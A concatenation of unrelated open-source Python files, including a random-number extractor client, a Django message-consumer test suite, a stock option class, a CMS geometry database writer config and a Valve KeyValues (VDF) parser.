) -> CQCExtractorJob:
"""Run the first extractor asynchronously.
Args:
ext1_input_num_bits: Number of input bits, for extractor 1.
ext1_output_num_bits: Number of output bits, for extractor 1.
ext1_raw_bytes: Initial random numbers, in bytes, for extractor 1.
ext1_wsr_bytes: Initial WSRs, in bytes, for extractor 1.
Returns:
An instance of ``CQCExtractorJob`` which can be used to retrieve the
results later.
Raises:
ValueError: If an invalid argument values are specified.
"""
if not ext1_input_num_bits or not ext1_output_num_bits:
raise ValueError("Invalid input arguments. ext1_input_num_bits and "
"ext1_output_num_bits must be non-zero.")
logger.info("Starting first extraction.")
# Run ext1
ext1_data = {"n": ext1_input_num_bits,
"m": ext1_output_num_bits}
ext1_files = {"x": ext1_raw_bytes,
"y": ext1_wsr_bytes}
response = self._client.extract(
name='cqc', method='ext1', data=ext1_data, files=ext1_files)
parameters = {'ext1_input_num_bits': ext1_input_num_bits,
'ext1_output_num_bits': ext1_output_num_bits,
'ext1_raw_bytes': ext1_raw_bytes,
'ext1_wsr_bytes': ext1_wsr_bytes}
return CQCExtractorJob(job_id=response['id'], client=self._client, parameters=parameters)
def run_async_ext2(
self,
ext2_seed: List[int],
ext2_seed_num_bits: int,
ext2_wsr_multiplier: int,
ext2_wsr_generator: Optional[Callable] = None
) -> CQCExtractorJob:
"""Run the second extractor asynchronously.
Args:
ext2_seed: Seed used for extractor 2, such as the output of extractor 1.
ext2_seed_num_bits: Number of bits in the seed, for extractor 2.
ext2_wsr_multiplier: WSR multiplier, for extractor 2. The number of
bits used by extractor 2 is ext2_seed_num_bits*ext2_wsr_multiplier.
ext2_wsr_generator: WSR generator used for extractor 2. It must take the
number of bits as the input and a list of random bits (0s and 1s)
                as the output. If ``None``, :func:`generate_wsr` is used.
Returns:
An instance of ``CQCExtractorJob`` which can be used to retrieve the
results later.
Raises:
ValueError: If an invalid argument values are specified.
"""
if not ext2_seed_num_bits or not ext2_wsr_multiplier:
raise ValueError("Invalid input arguments. ext2_seed_num_bits and "
"ext2_wsr_multiplier must be non-zero.")
logger.info("Starting second extraction.")
ext2_seed = bitarray_to_bytes(ext2_seed[:ext2_seed_num_bits]) # type: ignore[assignment]
if ext2_wsr_generator is None:
ext2_wsr_generator = generate_wsr
ext2_wsr = ext2_wsr_generator(ext2_seed_num_bits*ext2_wsr_multiplier)
ext2_wsr = bitarray_to_bytes(ext2_wsr)
ext2_data = {"a": ext2_seed_num_bits,
"b": ext2_wsr_multiplier}
ext2_files = {"r": ext2_seed,
"x": ext2_wsr}
response = self._client.extract(name='cqc', method='ext2',
data=ext2_data, files=ext2_files)
parameters = {'ext2_seed_num_bits': ext2_seed_num_bits,
'ext2_wsr_multiplier': ext2_wsr_multiplier,
'ext2_seed_bytes': ext2_seed,
'ext2_wsr': ext2_wsr}
return CQCExtractorJob(job_id=response['id'], client=self._client, parameters=parameters)
def retrieve_job(self, job_id: str) -> CQCExtractorJob:
"""Retrieve a previously submitted job.
Args:
job_id: Job ID.
Returns:
A ``CQCExtractorJob`` instance.
"""
return CQCExtractorJob(job_id, self._client)
def __repr__(self) -> str:
return "<{}('{}') from {}>".format(self.__class__.__name__,
self.name,
self._provider)
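# A minimal resumption sketch, assuming ``extractor`` is a CQCExtractor obtained
# from a provider's random-number service and ``saved_id`` is a job id returned
# by an earlier asynchronous call (both names are placeholders):
#
#   job = extractor.retrieve_job(saved_id)
#   random_bits = job.block_until_ready()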
|
bottery/conf/global_settings.py | romulocollopy/bottery | 250 | 12729531 | TEMPLATES = []
PLATFORMS = {}
MIDDLEWARES = []
|
sfm/message_consumer/test_sfm_ui_consumer.py | Xtuden-com/sfm-ui | 129 | 12729556 | <gh_stars>100-1000
from django.test import TestCase
from ui.models import Harvest, Collection, Group, CollectionSet, Credential, User, Seed, Warc, Export, HarvestStat
import json
from .sfm_ui_consumer import SfmUiConsumer
import iso8601
from mock import patch
from datetime import date
class ConsumerTest(TestCase):
def setUp(self):
# Create harvest model object
group = Group.objects.create(name="test_group")
user = User.objects.create_superuser(username="test_user", email="<EMAIL>",
password="<PASSWORD>")
user.groups.add(group)
collection_set = CollectionSet.objects.create(group=group, name="test_collection_set")
credential = Credential.objects.create(user=user, platform="test_platform",
token=json.dumps({}))
collection = Collection.objects.create(collection_set=collection_set, credential=credential,
harvest_type="test_type", name="test_collection",
harvest_options=json.dumps({}))
stream_collection = Collection.objects.create(collection_set=collection_set, credential=credential,
harvest_type=Collection.TWITTER_SAMPLE,
name="test_stream_collection",
harvest_options=json.dumps({}), is_on=True)
self.assertTrue(stream_collection.is_on)
Seed.objects.create(collection=collection, uid="131866249@N02", seed_id='1')
Seed.objects.create(collection=collection, token="library_of_congress", seed_id='2')
historical_collection = collection.history.all()[0]
historical_credential = historical_collection.credential.history.all()[0]
self.harvest = Harvest.objects.create(harvest_id="test:1",
collection=collection,
historical_collection=historical_collection,
historical_credential=historical_credential)
# Creating a second harvest to make sure that harvest stats don't conflict
harvest2 = Harvest.objects.create(harvest_id="test:2",
collection=collection,
historical_collection=historical_collection,
historical_credential=historical_credential)
historical_stream_collection = stream_collection.history.all()[0]
historical_stream_credential = historical_stream_collection.credential.history.all()[0]
self.stream_harvest = Harvest.objects.create(harvest_id="test:3",
collection=stream_collection,
historical_collection=historical_stream_collection,
historical_credential=historical_stream_credential)
HarvestStat.objects.create(harvest=harvest2, item="photos", count=3, harvest_date=date(2016, 5, 20))
Export.objects.create(export_id="test:2", user=user, export_type="test_type")
self.consumer = SfmUiConsumer()
def test_harvest_status_on_message(self):
self.consumer.routing_key = "harvest.status.test.test_search"
self.consumer.message = {
"id": "test:1",
"status": Harvest.RUNNING,
"date_started": "2015-07-28T11:17:36.640044",
"infos": [{"code": "test_code_1", "message": "congratulations"}],
"warnings": [{"code": "test_code_2", "message": "be careful"}],
"errors": [{"code": "test_code_3", "message": "oops"}],
"stats": {
"2016-05-20": {
"photos": 12,
},
"2016-05-21": {
"photos": 19,
},
},
"token_updates": {
"1": "j.littman"
},
"uids": {
"2": "671366249@N03"
},
"warcs": {
"count": 3,
"bytes": 345234242
},
"service": "Twitter Harvester",
"host": "f0c3c5ef7031",
"instance": "39",
}
# Trigger on_message
self.consumer.on_message()
# Check updated harvest model object
harvest = Harvest.objects.get(harvest_id="test:1")
self.assertEqual(Harvest.RUNNING, harvest.status)
self.assertEqual(12, harvest.harvest_stats.get(item="photos", harvest_date=date(2016, 5, 20)).count)
self.assertDictEqual({
"1": "j.littman"
}, harvest.token_updates)
self.assertDictEqual({
"2": "671366249@N03"
}, harvest.uids)
self.assertEqual(3, harvest.warcs_count)
self.assertEqual(345234242, harvest.warcs_bytes)
self.assertEqual(iso8601.parse_date("2015-07-28T11:17:36.640044"), harvest.date_started)
self.assertListEqual([{"code": "test_code_1", "message": "congratulations"}], harvest.infos)
self.assertListEqual([{"code": "test_code_2", "message": "be careful"}], harvest.warnings)
self.assertListEqual([{"code": "test_code_3", "message": "oops"}], harvest.errors)
self.assertEqual("Twitter Harvester", harvest.service)
self.assertEqual("f0c3c5ef7031", harvest.host)
self.assertEqual("39", harvest.instance)
# Check updated seeds
seed1 = Seed.objects.get(seed_id="1")
self.assertEqual("j.littman", seed1.token)
self.assertTrue(seed1.history_note.startswith("Changed token"))
seed2 = Seed.objects.get(seed_id="2")
self.assertEqual("671366249@N03", seed2.uid)
self.assertTrue(seed2.history_note.startswith("Changed uid"))
# Now update
self.consumer.message = {
"id": "test:1",
"status": Harvest.SUCCESS,
"date_started": "2015-07-28T11:17:36.640044",
"date_ended": "2015-07-28T11:17:42.539470",
"infos": [{"code": "test_code_1", "message": "congratulations"}],
"warnings": [{"code": "test_code_2", "message": "be careful"}],
"errors": [{"code": "test_code_3", "message": "oops"}],
"stats": {
"2016-05-20": {
"photos": 12,
},
"2016-05-21": {
"photos": 24,
"users": 1
},
},
"warcs": {
"count": 5,
"bytes": 645234242
},
"service": "Twitter Harvester",
"host": "f0c3c5ef7031",
"instance": "39",
}
# Trigger on_message
self.consumer.on_message()
# Check updated harvest model object
harvest = Harvest.objects.get(harvest_id="test:1")
self.assertEqual(Harvest.SUCCESS, harvest.status)
self.assertEqual(24, harvest.harvest_stats.get(item="photos", harvest_date=date(2016, 5, 21)).count)
self.assertEqual(1, harvest.harvest_stats.get(item="users", harvest_date=date(2016, 5, 21)).count)
self.assertEqual(5, harvest.warcs_count)
self.assertEqual(645234242, harvest.warcs_bytes)
self.assertEqual(iso8601.parse_date("2015-07-28T11:17:36.640044"), harvest.date_started)
self.assertEqual(iso8601.parse_date("2015-07-28T11:17:42.539470"), harvest.date_ended)
self.assertListEqual([{"code": "test_code_1", "message": "congratulations"}], harvest.infos)
self.assertListEqual([{"code": "test_code_2", "message": "be careful"}], harvest.warnings)
self.assertListEqual([{"code": "test_code_3", "message": "oops"}], harvest.errors)
self.assertEqual("Twitter Harvester", harvest.service)
self.assertEqual("f0c3c5ef7031", harvest.host)
self.assertEqual("39", harvest.instance)
# Now changes harvest options and check that seeds deleted.
# "deactivate_not_found_seeds": self.cleaned_data["deleted_accounts_option"],
# "deactivate_unauthorized_seeds": self.cleaned_data["protected_accounts_options"],
# "deactivate_suspended_seeds": self.cleaned_data["suspended_accounts_option"]
collection = Collection.objects.get(name="test_collection")
# Make sure both seeds are on.
seed_ids = []
for seed in collection.seeds.all():
self.assertTrue(seed.is_active)
seed_ids.append(seed.seed_id)
collection.harvest_options = json.dumps({
"deactivate_not_found_seeds": True,
"deactivate_unauthorized_seeds": False,
"deactivate_suspended_seeds": False
})
collection.save()
self.consumer.message = {
"id": "test:1",
"status": Harvest.SUCCESS,
"date_started": "2015-07-28T11:18:36.640044",
"date_ended": "2015-07-28T11:18:42.539470",
"warnings": [
{"code": "token_unauthorized", "message": "This token is unauthorized.", "seed_id": seed_ids[0]},
{"code": "token_not_found", "message": "This token is not found.", "seed_id": seed_ids[1]},
],
"service": "Twitter Harvester",
"host": "f0c3c5ef7031",
"instance": "39",
}
# Trigger on_message
self.consumer.on_message()
unauthorized_seed = Seed.objects.get(seed_id=seed_ids[0])
self.assertTrue(unauthorized_seed.is_active)
not_found_seed = Seed.objects.get(seed_id=seed_ids[1])
self.assertFalse(not_found_seed.is_active)
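        # Only deactivate_not_found_seeds was enabled in harvest_options above, so the
        # seed flagged with "token_not_found" is deactivated while the seed flagged
        # with "token_unauthorized" stays active.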
@patch("message_consumer.sfm_ui_consumer.collection_stop")
def test_harvest_status_stream_failed_on_message(self, mock_collection_stop):
self.consumer.routing_key = "harvest.status.twitter.twitter_sample"
self.consumer.message = {
"id": "test:3",
"status": Harvest.FAILURE,
"date_started": "2015-07-28T11:17:36.640044",
"date_ended": "2015-07-28T11:17:42.539470"
}
# Trigger on_message
self.consumer.on_message()
# Check updated harvest model object
harvest = Harvest.objects.get(harvest_id="test:3")
self.assertEqual(Harvest.FAILURE, harvest.status)
self.assertFalse(harvest.collection.is_on)
mock_collection_stop.assert_called_once_with(harvest.collection.id)
@patch("message_consumer.sfm_ui_consumer.collection_stop")
def test_rogue_harvest(self, mock_collection_stop):
self.consumer.routing_key = "harvest.status.twitter.twitter_sample"
self.consumer.message = {
"id": "test:3",
"status": Harvest.RUNNING,
"date_started": "2015-07-28T11:17:36.640044",
"date_ended": "2015-07-28T11:17:42.539470"
}
# Trigger on_message
self.consumer.on_message()
# Check updated harvest model object
harvest = Harvest.objects.get(harvest_id="test:3")
self.assertEqual(Harvest.RUNNING, harvest.status)
self.assertTrue(harvest.collection.is_on)
# Mark the harvest as already being completed.
harvest.status = Harvest.SUCCESS
harvest.save()
# Trigger on_message
self.consumer.on_message()
mock_collection_stop.assert_called_once_with(harvest.collection.id)
def test_on_message_ignores_bad_routing_key(self):
self.consumer.routing_key = "xharvest.status.test.test_search"
# Trigger on_message and nothing happens
self.consumer.on_message()
def test_on_message_ignores_unknown_harvest(self):
self.consumer.routing_key = "harvest.status.test.test_search"
self.consumer.message = {
"id": "xtest:1"
}
# Trigger on_message and nothing happens
self.consumer.on_message()
def test_warc_created_on_message(self):
self.consumer.routing_key = "warc_created"
self.consumer.message = {
"warc": {
"path": "/var/folders/_d/3zzlntjs45nbq1f4dnv48c499mgzyf/T/tmpKwq9NL/test_collection_set/2015/07/28/"
"11/" +
"test_collection_set-flickr-2015-07-28T11:17:36Z.warc.gz",
"sha1": "7512e1c227c29332172118f0b79b2ca75cbe8979",
"bytes": 26146,
"id": "test_collection-flickr-2015-07-28T11:17:36Z",
"date_created": "2015-07-28T11:17:36.640178"
},
"collection_set": {
"path": <KEY>",
"id": "test_collection_set"
},
"harvest": {
"id": "test:1",
}
}
# Trigger on_message
self.consumer.on_message()
# Check created Warc model object
warc = Warc.objects.get(warc_id="test_collection-flickr-2015-07-28T11:17:36Z")
self.assertEqual(self.consumer.message["warc"]["path"], warc.path)
self.assertEqual(self.consumer.message["warc"]["sha1"], warc.sha1)
self.assertEqual(self.consumer.message["warc"]["bytes"], warc.bytes)
self.assertEqual(iso8601.parse_date("2015-07-28T11:17:36.640178"), warc.date_created)
self.assertEqual(self.harvest, warc.harvest)
def test_export_status_on_message(self):
self.consumer.routing_key = "export.status.test"
self.consumer.message = {
"id": "test:2",
"status": "running",
"date_started": "2015-07-28T11:17:36.640044",
"infos": [{"code": "test_code_1", "message": "congratulations"}],
"warnings": [{"code": "test_code_2", "message": "be careful"}],
"errors": [{"code": "test_code_3", "message": "oops"}],
"service": "Twitter Exporter",
"host": "f0c3c5ef7031",
"instance": "39",
}
# Trigger on_message
self.consumer.on_message()
# Check updated harvest model object
export = Export.objects.get(export_id="test:2")
self.assertEqual("running", export.status)
self.assertEqual(iso8601.parse_date("2015-07-28T11:17:36.640044"), export.date_started)
self.assertIsNone(export.date_ended)
self.assertListEqual([{"code": "test_code_1", "message": "congratulations"}], export.infos)
self.assertListEqual([{"code": "test_code_2", "message": "be careful"}], export.warnings)
self.assertListEqual([{"code": "test_code_3", "message": "oops"}], export.errors)
self.assertEqual("Twitter Exporter", export.service)
self.assertEqual("f0c3c5ef7031", export.host)
self.assertEqual("39", export.instance)
# Now update
self.consumer.message = {
"id": "test:2",
"status": "completed success",
"date_started": "2015-07-28T11:17:36.640044",
"date_ended": "2015-07-28T11:17:42.539470",
"infos": [{"code": "test_code_1", "message": "congratulations"}],
"warnings": [{"code": "test_code_2", "message": "be careful"}],
"errors": [{"code": "test_code_3", "message": "oops"}],
"service": "Twitter Exporter",
"host": "f0c3c5ef7031",
"instance": "39",
}
# Trigger on_message
self.consumer.on_message()
# Check updated harvest model object
export = Export.objects.get(export_id="test:2")
self.assertEqual("completed success", export.status)
self.assertEqual(iso8601.parse_date("2015-07-28T11:17:36.640044"), export.date_started)
self.assertEqual(iso8601.parse_date("2015-07-28T11:17:42.539470"), export.date_ended)
self.assertListEqual([{"code": "test_code_1", "message": "congratulations"}], export.infos)
self.assertListEqual([{"code": "test_code_2", "message": "be careful"}], export.warnings)
self.assertListEqual([{"code": "test_code_3", "message": "oops"}], export.errors)
self.assertEqual("Twitter Exporter", export.service)
self.assertEqual("f0c3c5ef7031", export.host)
self.assertEqual("39", export.instance)
|
Tests/Frequently_used_code/Polygon_drill_test.py | ScriptBox99/dea-notebooks | 282 | 12729567 | <filename>Tests/Frequently_used_code/Polygon_drill_test.py
import pytest
from pathlib import Path
from testbook import testbook
TEST_DIR = Path(__file__).parent.parent.resolve()
NB_DIR = TEST_DIR.parent
NB_PATH = NB_DIR / "Frequently_used_code" / "Polygon_drill.ipynb"
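# The module-scoped fixture below runs the whole notebook once via testbook and
# shares the executed kernel, so individual tests can pull notebook variables out
# with tb.ref() without re-executing the notebook each time.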
@pytest.fixture(scope="module")
def tb():
with testbook(NB_PATH, execute=True) as tb:
yield tb
def test_ok(tb):
assert True # ok
def test_geometry(tb):
gdf = tb.ref("polygon_to_drill")
assert "geometry" in gdf.columns
def test_vars(tb):
ds = tb.ref("data")
expected_vars = [
"time",
"y",
"x",
"spatial_ref",
"nbart_red",
"nbart_green",
"nbart_blue",
]
for var in expected_vars:
assert var in ds.variables
def test_shape(tb):
ds = tb.ref("mask")
assert len(ds.x) == 97
assert len(ds.y) == 120
def test_masked(tb):
ds = tb.ref("data_masked")
assert ds.nbart_red.isnull().any().item()
|
slack_bolt/authorization/__init__.py | korymath/bolt-python | 160 | 12729613 | from .authorize_result import AuthorizeResult
|
B03898_10_codes/StockOption.py | prakharShuklaOfficial/Mastering-Python-for-Finance-source-codes | 446 | 12729683 | """
README
======
This file contains Python code.
======
"""
""" Store common attributes of a stock option """
import math
class StockOption(object):
def __init__(self, S0, K, r, T, N, params):
self.S0 = S0
self.K = K
self.r = r
self.T = T
        self.N = max(1, N) # Ensure N has at least 1 time step
self.STs = None # Declare the stock prices tree
""" Optional parameterss used by derived classes """
self.pu = params.get("pu", 0) # Probability of up state
self.pd = params.get("pd", 0) # Probability of down state
        self.div = params.get("div", 0) # Dividend yield
self.sigma = params.get("sigma", 0) # Volatility
self.is_call = params.get("is_call", True) # Call or put
        self.is_european = params.get("is_eu", True) # European or American exercise
""" Computed values """
self.dt = T/float(N) # Single time step, in years
self.df = math.exp(
-(r-self.div) * self.dt) # Discount factor |
CondTools/Geometry/test/writehelpers/geometryExtended2021DD4hep_writer.py | Purva-Chaudhari/cmssw | 852 | 12729691 | <filename>CondTools/Geometry/test/writehelpers/geometryExtended2021DD4hep_writer.py
import FWCore.ParameterSet.Config as cms
from Configuration.Eras.Era_Run3_dd4hep_cff import Run3_dd4hep
process = cms.Process("GeometryWriter", Run3_dd4hep)
from Configuration.ProcessModifiers.dd4hep_cff import dd4hep
process.load('CondCore.CondDB.CondDB_cfi')
process.load('Configuration.Geometry.GeometryDD4hepExtended2021_cff')
process.load('Geometry.CaloEventSetup.CaloGeometryDBWriter_cfi')
process.load('CondTools.Geometry.HcalParametersWriter_cff')
process.load("Geometry.MuonNumbering.muonGeometryConstants_cff")
process.CaloGeometryBuilder = cms.ESProducer("CaloGeometryBuilder",
SelectedCalos = cms.vstring(
'HCAL',
'ZDC',
'EcalBarrel',
'EcalEndcap',
'EcalPreshower',
'TOWER'
)
)
process.source = cms.Source("EmptyIOVSource",
lastValue = cms.uint64(1),
timetype = cms.string('runnumber'),
firstValue = cms.uint64(1),
interval = cms.uint64(1)
)
# Reading the big XML file below is the only way to fill the
# non-reco part of the database.
process.XMLGeometryWriter = cms.EDAnalyzer("XMLGeometryBuilder",
XMLFileName = cms.untracked.string("./geSingleBigFile.xml"),
ZIP = cms.untracked.bool(True)
)
process.TrackerGeometryWriter = cms.EDAnalyzer("PGeometricDetBuilder",fromDD4hep=cms.bool(True))
process.TrackerParametersWriter = cms.EDAnalyzer("PTrackerParametersDBBuilder",fromDD4hep=cms.bool(True))
process.CaloGeometryWriter = cms.EDAnalyzer("PCaloGeometryBuilder",fromDD4Hep = cms.untracked.bool(True))
process.CSCGeometryWriter = cms.EDAnalyzer("CSCRecoIdealDBLoader",fromDD4Hep = cms.untracked.bool(True))
process.DTGeometryWriter = cms.EDAnalyzer("DTRecoIdealDBLoader",fromDD4Hep = cms.untracked.bool(True))
process.RPCGeometryWriter = cms.EDAnalyzer("RPCRecoIdealDBLoader",fromDD4Hep = cms.untracked.bool(True))
process.GEMGeometryWriter = cms.EDAnalyzer("GEMRecoIdealDBLoader",fromDD4Hep = cms.untracked.bool(True))
process.CondDB.timetype = cms.untracked.string('runnumber')
process.CondDB.connect = cms.string('sqlite_file:myfile.db')
process.PoolDBOutputService = cms.Service("PoolDBOutputService",
process.CondDB,
toPut = cms.VPSet(cms.PSet(record = cms.string('GeometryFileRcd'),tag = cms.string('XMLFILE_Geometry_TagXX_Extended2021_mc')),
cms.PSet(record = cms.string('IdealGeometryRecord'),tag = cms.string('TKRECO_Geometry_TagXX')),
cms.PSet(record = cms.string('PTrackerParametersRcd'),tag = cms.string('TKParameters_Geometry_TagXX')),
cms.PSet(record = cms.string('PEcalBarrelRcd'), tag = cms.string('EBRECO_Geometry_TagXX')),
cms.PSet(record = cms.string('PEcalEndcapRcd'), tag = cms.string('EERECO_Geometry_TagXX')),
cms.PSet(record = cms.string('PEcalPreshowerRcd'),tag = cms.string('EPRECO_Geometry_TagXX')),
cms.PSet(record = cms.string('PHcalRcd'), tag = cms.string('HCALRECO_Geometry_TagXX')),
cms.PSet(record = cms.string('HcalParametersRcd'), tag = cms.string('HCALParameters_Geometry_TagXX')),
cms.PSet(record = cms.string('PCaloTowerRcd'), tag = cms.string('CTRECO_Geometry_TagXX')),
cms.PSet(record = cms.string('PZdcRcd'), tag = cms.string('ZDCRECO_Geometry_TagXX')),
cms.PSet(record = cms.string('PCastorRcd'), tag = cms.string('CASTORRECO_Geometry_TagXX')),
cms.PSet(record = cms.string('CSCRecoGeometryRcd'),tag = cms.string('CSCRECO_Geometry_TagXX')),
cms.PSet(record = cms.string('CSCRecoDigiParametersRcd'),tag = cms.string('CSCRECODIGI_Geometry_TagXX')),
cms.PSet(record = cms.string('DTRecoGeometryRcd'),tag = cms.string('DTRECO_Geometry_TagXX')),
cms.PSet(record = cms.string('RPCRecoGeometryRcd'),tag = cms.string('RPCRECO_Geometry_TagXX')),
cms.PSet(record = cms.string('GEMRecoGeometryRcd'),tag = cms.string('GEMRECO_Geometry_TagXX'))
)
)
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1)
)
process.p1 = cms.Path(process.XMLGeometryWriter+process.TrackerGeometryWriter+process.TrackerParametersWriter+process.CaloGeometryWriter+process.HcalParametersWriter+process.CSCGeometryWriter+process.DTGeometryWriter+process.RPCGeometryWriter+process.GEMGeometryWriter)
|
cellphonedb/tools/app.py | BioTuring-Notebooks/CellphoneDB | 278 | 12729742 | import os
from flask import Flask
this_file_dir = os.path.dirname(os.path.realpath(__file__))
data_dir = '{}/data'.format(this_file_dir)
output_dir = '{}/out'.format(this_file_dir)
downloads_dir = '{}/downloads'.format(data_dir)
def create_app():
app = Flask(__name__)
return app
|
valve/vdf.py | Crowbar-Sledgehammer/python-valve | 136 | 12729743 | <reponame>Crowbar-Sledgehammer/python-valve
# -*- coding: utf-8 -*-
# Copyright (C) 2013 <NAME>
"""
Implements a parser for the Valve Data Format (VDF), often referred
to as KeyValues.
Provides both parsing and serialisation functionality. The API is
designed to mirror that of the built-in JSON module.
https://developer.valvesoftware.com/wiki/KeyValues
"""
import string
import re
_KV_KEY = 0
_KV_BLOCK = 1
_KV_BLOCKEND = 2
_KV_PAIR = 3
ALWAYS = 0
UNQUOTED = 1
NEVER = 2
def coerce_type(token):
"""
Attempts to convert a token to a native Python object by
matching it against various regexes.
Will silently fall back to string if no conversion can be made.
Currently only capable of converting integers and floating point
numbers.
"""
regexes = [
# regex, converter
(r"^-?[0-9]+$", int),
(r"^[-+]?[0-9]*\.?[0-9]+$", float),
# TODO: ("rgb", pass),
# TODO: ("hex triplet", pass),
]
for regex, converter in regexes:
print(regex, converter, token, re.match(regex, token, re.UNICODE))
if re.match(regex, token, re.UNICODE):
return converter(token)
# Fallback to string
return token
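# Illustrative sketch of coerce_type behaviour (shown as comments, not executed):
#   coerce_type("42")    -> 42 (int)
#   coerce_type("-3.25") -> -3.25 (float)
#   coerce_type("hello") -> "hello" (no regex matches, falls back to the string)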
# Largely based on necavi's https://github.com/necavi/py-keyvalues
def loads(src, encoding=None, coerce_=UNQUOTED):
"""
    Loads a VDF string into a series of nested dictionaries.
encoding -- The encoding of the given source string if not
Unicode. If this is not set and a bytestring is
given, ASCII will be the assumed encoding.
    coerce_  -- can be set to determine whether an attempt should
                be made to convert values to native Python type
                equivalents.
                If set to UNQUOTED (the default), only values that
                are not enclosed in double quotes will be
                converted.
                If set to ALWAYS, an attempt will be made to convert
                regardless of whether the value is quoted or not;
                this is not recommended.
If set to NEVER, no attempt will be made to
convert. Should produce most reliable behaviour.
"""
if isinstance(src, str) and encoding is None:
encoding = "ascii"
if encoding is not None:
src = src.decode(encoding)
# else:
# assume unicode
# pair type, pair key, pair value, coerce
pairs = [[_KV_BLOCK, "", None, False]]
# _KV_KEY -- all tokens begin as this
# _KV_BLOCK -- is for when a _KV_KEY is followed by a {
# _KV_PAIR -- is for when a _KV_KEY is followed by another token
extended_alphanumeric = set(
string.ascii_letters.decode("ascii") +
unicode(string.digits) +
u".-_")
i = 0
line = 1
col = 0
token = None
try:
while i < len(src):
char = src[i]
# Whitespace
if char in {u" ", u"\t"}:
pass
# End-of-line
elif char == u"\n":
try:
if src[i+1] == u"\r": # Will IndexError at EOF
i += 1
col += 1
line += 1
col = 0
except IndexError:
pass
# End-of-line
elif char == u"\r":
try:
if src[i+1] == u"\n": # Will IndexError at EOF
i += 1
col += 1
line += 1
col = 0
except IndexError:
pass
# Double-quotes enclosed token
elif char == u"\"":
token = u""
while True:
i += 1
col += 1
char = src[i]
# I don't agree with the assertion in py-keyvalues
# that \n or \r should also terminate a token if
                    # it's quoted.
if char == u"\"":
break
elif char in {"\r", "\n"}:
raise SyntaxError("End-of-line quoted token")
elif char == u"\\":
i += 1
try:
escaped_char = src[i]
except IndexError:
raise SyntaxError("EOF in escaped character")
try:
char = {
u"n": u"\n",
u"r": u"\r",
u"t": u"\t",
u"\"": u"\"",
u"\\": u"\\",
}[escaped_char]
except KeyError:
raise SyntaxError("Invalid escape character")
token += char
if pairs[-1][0] == _KV_KEY:
pairs[-1][0] = _KV_PAIR
pairs[-1][2] = token
pairs[-1][3] = coerce_ in [ALWAYS]
else:
pairs.append([_KV_KEY, token, None, False])
# Unquoted token
elif char in extended_alphanumeric:
token = u""
while True:
token += char
i += 1
col += 1
char = src[i]
if char not in extended_alphanumeric:
                        # Assume end of token; in most cases this will be
                        # white space or a new line
# If newline, rewind 1 char so it can be
# properly handled by the end-of-line processors
if char in {u"\n", u"\r"}:
i -= 1
col -= 1
char = src[i]
break
if pairs[-1][0] == _KV_KEY:
pairs[-1][0] = _KV_PAIR
pairs[-1][2] = token
pairs[-1][3] = coerce_ in [ALWAYS, UNQUOTED]
else:
pairs.append([_KV_KEY, token, None, False])
# I don't know if there are any cases where an unquoted
# key may be illegal, e.g. if it contains only digits.
# I assume it is, but I won't handle it for now.
# Block start
elif char == u"{":
if pairs[-1][0] != _KV_KEY:
raise SyntaxError("Block doesn't follow block name")
pairs[-1][0] = _KV_BLOCK
elif char == u"}":
pairs.append([_KV_BLOCKEND, None, None, False])
else:
raise SyntaxError("Unexpected character")
i += 1
col += 1
except SyntaxError as exc:
raise ValueError("{} '{}'; line {} column {}".format(
exc.message, src[i], line, col))
dict_ = {}
dict_stack = [dict_]
CURRENT = -1
PREVIOUS = -2
for type, key, value, should_coerce in pairs[1:]:
if type == _KV_BLOCK:
dict_stack.append({})
dict_stack[PREVIOUS][key] = dict_stack[CURRENT]
elif type == _KV_BLOCKEND:
dict_stack = dict_stack[:CURRENT]
elif type == _KV_PAIR:
dict_stack[CURRENT][key] = (coerce_type(value) if
should_coerce else value)
# else:
# should never occur, but would be caused by a token not being
# followed by a block or value
return dict_
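# A minimal usage sketch (the key/value names are invented for illustration):
#   loads('"root"\n{\n    "name" "demo"\n    "count" 3\n}\n')
#   should return {"root": {"name": "demo", "count": 3}} with the default
#   coerce_=UNQUOTED, since the unquoted 3 is coerced to an int.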
def load(fp, encoding=None, coerce_=UNQUOTED):
"""
Same as loads but takes a file-like object as the source.
"""
return loads(fp.read(), encoding, coerce_)
def dumps(obj, encoding=None, indent=u" ", object_encoders={}):
"""
Serialises a series of nested dictionaries to the VDF/KeyValues
format and returns it as a string.
If 'encoding' isn't specified a Unicode string will be returned,
    else an encoded bytestring will be.
'indent' is the string to be used to indent nested blocks. The
string given should be Unicode and represent one level of
indentation. Four spaces by default.
'object_encoders' maps a series of types onto serialisers, which
convert objects to their VDF equivalent. If no encoder is
specified for a type it'll fall back to using __unicode__.
Note that currently this likely causes None to be encoded
incorrectly. Also, floats which include the exponent in their
    textual representation may also be 'wrong.'
"""
object_codecs = {
float: lambda v: unicode(repr(v / 1.0)),
}
object_codecs.update(object_encoders)
    # I don't know how TYPE_NONE (None) is meant to be encoded, so we
# just use unicode() until it's known.
lines = []
def recurse_obj(obj, indent_level=0):
ind = indent * indent_level
for key, value in obj.iteritems():
if isinstance(value, dict):
lines.append(u"{}\"{}\"".format(ind, key))
lines.append(u"{}{{".format(ind))
recurse_obj(value, indent_level + 1)
lines.append(u"{}}}".format(ind))
else:
lines.append(u"{}\"{}\"{}\"{}\"".format(
ind,
key,
indent,
object_codecs.get(type(value), unicode)(value),
))
recurse_obj(obj)
if encoding is not None:
return u"\n".join(lines).encode(encoding)
else:
return u"\n".join(lines)
def dump(obj, fp, encoding, indent=u" ", object_encoders={}):
"""
Same as dumps but takes a file-like object 'fp' which will be
written to.
"""
return fp.write(dumps(obj, encoding, indent, object_encoders))
|
compiler_gym/envs/llvm/service/passes/common.py | mostafaelhoushi/CompilerGym | 562 | 12729779 | <filename>compiler_gym/envs/llvm/service/passes/common.py
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from typing import NamedTuple, Optional
class Pass(NamedTuple):
"""The declaration of an LLVM pass."""
# The name of the pass, e.g. "AddDiscriminatorsPass".
name: str
# The opt commandline flag which turns this pass on, e.g. "-add-discriminators".
flag: str
# The docstring for this pass, as reported by `opt -help`. E.g. "Add DWARF path discriminators".
description: str
# The path of the C++ file which defines this pass, relative to the LLVM source tree root.
source: str
# The path of the C++ header which declares this pass, relative to the LLVM source tree root.
# If the header path could not be inferred, this is None.
header: Optional[str]
# Boolean flags set in INITIALIZE_PASS().
cfg: bool
is_analysis: bool
|
benchmark/tests/test_automatic_test.py | yuanliya/Adlik | 548 | 12729784 | # Copyright 2019 ZTE corporation. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
"""
